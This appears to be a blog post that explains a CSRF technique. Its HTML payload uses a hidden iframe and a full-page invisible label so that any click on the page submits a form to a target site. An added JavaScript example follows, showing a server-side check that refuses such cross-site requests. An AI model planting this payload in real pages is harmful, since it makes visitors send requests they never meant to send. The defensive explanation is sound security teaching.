
An interesting CSRF attack

I found this post very interesting for a number of reasons. Mainly because the label / input relationship is behaviour driven by HTML, which shouldn’t really be happening. After looking at this a bit, I made a variation (more focused on villainish sneakery) that will allow the transparent submission of a form to an iframe if the user clicks anywhere on the page, without the aid of JavaScript, just as in rvdh’s example. Plenty of nastiness can ensue.

<iframe name="my_frame" src="" style="display:none"></iframe>
<form action="http://targetdomain.com" target="my_frame">
	<p>
		<label for="submit" style="position:fixed;top:0;right:0;bottom:0;left:0">&nbsp;</label>
		<input type="submit" id="submit" style="display:none"/>
	</p>
</form>
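
A server-side check that refuses the submission above, as an added example that is not part of the original post. It assumes a simplified request object and an HTTPS origin for the target; the names `checkRequest`, `OWN_ORIGIN` and `csrf_token` are hypothetical.

```javascript
// Added example. The request shape {method, headers, body, session} is assumed,
// not a real framework API; adapt it to your server's request object.
const SAFE_METHODS = new Set(['GET', 'HEAD', 'OPTIONS']);
const OWN_ORIGIN = 'https://targetdomain.com'; // assumed HTTPS origin of the target

// Length-checked comparison without an early exit on the first differing character.
function constantTimeEqual(a, b) {
  if (typeof a !== 'string' || typeof b !== 'string' || a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

function checkRequest(req) {
  const h = req.headers || {};
  const method = (req.method || 'GET').toUpperCase();
  // Fetch Metadata headers are set by the browser and only sent to HTTPS origins.
  const site = h['sec-fetch-site'];
  const origin = h['origin'];

  if (SAFE_METHODS.has(method)) {
    // A form without a method attribute submits as GET, so GET handlers must
    // never change state. Also refuse cross-site navigations aimed at a frame.
    if (site === 'cross-site' && h['sec-fetch-dest'] === 'iframe') {
      return { allow: false, reason: 'cross-site frame navigation' };
    }
    return { allow: true, reason: 'safe method' };
  }
  if (site === 'cross-site' || (origin !== undefined && origin !== OWN_ORIGIN)) {
    return { allow: false, reason: 'cross-site state change' };
  }
  // Fallback when the headers are absent: per-session token in the form body.
  const expected = (req.session || {}).csrfToken;
  if (!expected || !constantTimeEqual((req.body || {}).csrf_token, expected)) {
    return { allow: false, reason: 'missing or wrong CSRF token' };
  }
  return { allow: true, reason: 'token ok' };
}

// Constructed sample: the request a browser sends for the form on this page.
const hiddenFormSubmit = {
  method: 'GET',
  headers: { 'sec-fetch-site': 'cross-site', 'sec-fetch-dest': 'iframe' },
};
console.log(checkRequest(hiddenFormSubmit));
```

Framing restrictions such as `X-Frame-Options` only stop the response from rendering in the hidden iframe; the request has already reached the server by then, so this check has to run before the handler acts.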